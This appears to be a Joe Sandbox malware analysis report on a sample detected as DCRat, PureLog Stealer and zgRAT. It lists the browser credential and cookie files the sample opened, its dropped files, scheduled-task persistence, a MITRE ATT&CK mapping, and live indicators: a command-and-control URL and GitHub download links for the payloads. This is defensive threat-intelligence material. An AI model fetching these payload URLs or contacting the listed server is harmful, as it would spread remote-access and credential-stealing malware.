Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000001E.00000002.2570123434.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2570123434.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2570123434.000000000330C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2570123434.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2570123434.0000000003652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1687630200.00000000133DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: comReviewsvc.exe PID: 6544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe PID: 6196, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Dfim58cp4J.exe, type: SAMPLE
Source: Yara match	File source: 1.0.Dfim58cp4J.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DC.exe.55d570b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DC.exe.55be70b.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.comReviewsvc.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.1412722099.0000000005587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1412248106.0000000005570000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.1312124353.0000000000822000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1654892379.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, type: DROPPED
Source: Yara match	File source: C:\ServerfontSessiondhcpcommon\System.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe, type: DROPPED
Source: Yara match	File source: C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe, type: DROPPED
Source: Yara match	File source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\DC.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 3.3.DC.exe.55d570b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DC.exe.55be70b.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.comReviewsvc.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, type: DROPPED
Source: Yara match	File source: C:\ServerfontSessiondhcpcommon\System.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe, type: DROPPED
Source: Yara match	File source: C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe, type: DROPPED
Source: Yara match	File source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\DC.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	241 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	12 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	157 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	Login Hook	13 Software Packing	NTDS	351 Security Software Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	112 Masquerading	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	261 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Dfim58cp4J.exe	66%	ReversingLabs	ByteCode-MSIL.Downloader.Ader
Dfim58cp4J.exe	67%	Virustotal		Browse
Dfim58cp4J.exe	100%	Avira	HEUR/AGEN.1323341
Dfim58cp4J.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe	100%	Avira	HEUR/AGEN.1323342
C:\ServerfontSessiondhcpcommon\System.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\DC.exe	100%	Avira	VBS/Runner.VPG
C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\wcGwEkbJ.log	100%	Avira	HEUR/AGEN.1300079
C:\ServerfontSessiondhcpcommon\eaCU8Ys0bTHhRgAXuIP2K2y8ZFscnTNFvzEdLnUp1L90rgZK9PR.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\Desktop\fFKZyJVH.log	100%	Avira	TR/AVI.Agent.updqb
C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\jlgss9VamV.bat	100%	Avira	BAT/Delbat.C
C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\OyuueWqt.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\Desktop\aQQAtfnE.log	100%	Avira	TR/AVI.Agent.updqb
C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\VWrJOgQa.log	100%	Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe	100%	Joe Sandbox ML
C:\ServerfontSessiondhcpcommon\System.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\DC.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\xRmeReqW.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\wcGwEkbJ.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\GQkmowWr.log	100%	Joe Sandbox ML
C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\DRWwxNDB.log	100%	Joe Sandbox ML
C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\OyuueWqt.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\ServerfontSessiondhcpcommon\System.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\DC.exe	83%	ReversingLabs	Win32.Trojan.Uztuby
C:\Users\user\Desktop\DRWwxNDB.log	16%	ReversingLabs
C:\Users\user\Desktop\GKmeiJoz.log	25%	ReversingLabs
C:\Users\user\Desktop\GQkmowWr.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\MnYteEKs.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\OyuueWqt.log	4%	ReversingLabs
C:\Users\user\Desktop\VWrJOgQa.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\aQQAtfnE.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\eIjRcJGM.log	25%	ReversingLabs
C:\Users\user\Desktop\fFKZyJVH.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\nzxGUrLb.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\wcGwEkbJ.log	4%	ReversingLabs
C:\Users\user\Desktop\xRmeReqW.log	16%	ReversingLabs

Source	Detection	Scanner	Label
http://188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php	100%	Avira URL Cloud	malware
http://188.120.227.56/VoiddbVoiddb/	0%	Avira URL Cloud	safe
http://188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.phpU1NW	0%	Avira URL Cloud	safe
http://188.120.227.56	0%	Avira URL Cloud	safe
http://188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.phpntdr	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
github.com	20.233.83.145	true	false		high
objects.githubusercontent.com	185.199.110.133	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php	true	Avira URL Cloud: malware	unknown
https://github.com/GGGamessamp/fewfwe/releases/download/ZigZag/DCRatBuild.exe	false		high
https://github.com/GGGamessamp/fewfwe/releases/download/ZigZag/M.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	false		high
http://github.com	Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002D02000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	false		high
https://objects.githubusercontent.com/github-production-release-asset-2e65be/868158503/16b63538-1c52	Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	false		high
https://objects.githubusercontent.com	Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002D26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com	Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://188.120.227.56	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.0000000003652000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	false		high
https://objects.githubusercontent.com/github-production-release-asset-2e65be/868158503/6f820ef3-3e4b	Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002D26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	false		high
http://188.120.227.56/VoiddbVoiddb/	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.000000000330C000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.phpntdr	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000034BE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.phpU1NW	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000034BE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	false		high
http://objects.githubusercontent.com	Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp, Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, comReviewsvc.exe, 00000008.00000002.1681884269.000000000393F000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.000000000330C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.120.227.56	unknown	Russian Federation	29182	THEFIRST-ASRU	true
20.233.83.145	github.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.199.110.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572162
Start date and time:	2024-12-10 07:31:45 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Dfim58cp4J.exe renamed because original name is a hash value
Original Sample Name:	1430af130a1e5556185aa87e6d8d933f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@39/59@3/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, services.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, ApplicationFrameHost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212, 23.218.208.109
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Dfim58cp4J.exe, PID 4656 because it is empty
Execution Graph export aborted for target System.exe, PID 2060 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:32:49	API Interceptor	74x Sleep call for process: Dfim58cp4J.exe modified
03:13:04	API Interceptor	53323x Sleep call for process: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe modified
09:12:57	Task Scheduler	Run new task: ApplicationFrameHost path: "C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe"
09:12:57	Task Scheduler	Run new task: ApplicationFrameHostA path: "C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe"
09:12:57	Task Scheduler	Run new task: HHfZjsufdvzxFpnqfrPtJXXoIspuxA path: "C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe"
09:12:57	Task Scheduler	Run new task: HHfZjsufdvzxFpnqfrPtJXXoIspuxAH path: "C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe"
09:12:57	Task Scheduler	Run new task: services path: "C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe"
09:12:58	Task Scheduler	Run new task: servicess path: "C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe"
09:12:58	Task Scheduler	Run new task: System path: "C:\ServerfontSessiondhcpcommon\System.exe"
09:12:58	Task Scheduler	Run new task: SystemS path: "C:\ServerfontSessiondhcpcommon\System.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.120.227.56	2f3cc3bc5e36d27c9b2020e20fc2a031efba9ec81995a.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php
188.120.227.56	WmiPrvSE.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.120.227.56/3Processrequest/external45/Pipe5_/Dleimageprotect/basetoAuth/Http/16/Pythoneternallinux/5Central4Vm/pipeapiServeruploads.php
20.233.83.145	Y5kEUsYDFr.exe	Get hash	malicious	Unknown	Browse	github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe
185.199.110.133	sys_upd.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_menu..ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_phshop..ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_atCAD.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	xK44OOt7vD.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	Lm9IJ4r9oO.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm_crypter.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
github.com	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	20.233.83.145
	run.cmd	Get hash	malicious	Unknown	Browse	20.233.83.145
	zW72x5d91l.bat	Get hash	malicious	Unknown	Browse	20.233.83.145
	PYsje7DgYO.exe	Get hash	malicious	RHADAMANTHYS	Browse	20.233.83.145
	EcjH6Dq36Y.exe	Get hash	malicious	RHADAMANTHYS	Browse	20.233.83.145
	MsmxWY8nj7.exe	Get hash	malicious	RHADAMANTHYS	Browse	20.233.83.145
	Y5kEUsYDFr.exe	Get hash	malicious	Unknown	Browse	20.233.83.145
	QlyOUFGIFB.exe	Get hash	malicious	MicroClip	Browse	20.233.83.146
	Cooperative Agreement0000800380.docx.exe	Get hash	malicious	Babadeda, Blank Grabber	Browse	20.233.83.145
	1.exe	Get hash	malicious	Havoc, RUSTDESK	Browse	20.233.83.145
objects.githubusercontent.com	QlyOUFGIFB.exe	Get hash	malicious	MicroClip	Browse	185.199.111.133
	Cooperative Agreement0000800380.docx.exe	Get hash	malicious	Babadeda, Blank Grabber	Browse	185.199.109.133
	https://github.com/kernelwernel/VMAware/releases/download/v1.9/vmaware64.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	SplpM1fFkV.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	file.exe	Get hash	malicious	Python Stealer, Amadey, LummaC Stealer, Nymaim, Stealc	Browse	185.199.108.133
	file.exe	Get hash	malicious	Python Stealer	Browse	185.199.110.133
	file.exe	Get hash	malicious	Python Stealer	Browse	185.199.111.133
	https://github.com/karakun/OpenWebStart/releases/download/v1.10.1/OpenWebStart_windows-x64_1_10_1.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	https://github.com/thonny/thonny/releases/download/v4.1.6/thonny-4.1.6.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	9LrEuTWP8s.exe	Get hash	malicious	Meduza Stealer, PureLog Stealer, RedLine, zgRAT	Browse	185.199.111.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEFIRST-ASRU	KyC6hVwU8Z.exe	Get hash	malicious	DCRat	Browse	185.43.5.93
	gorkmTnChA.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.246.67.73
	home.mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.230.119.182
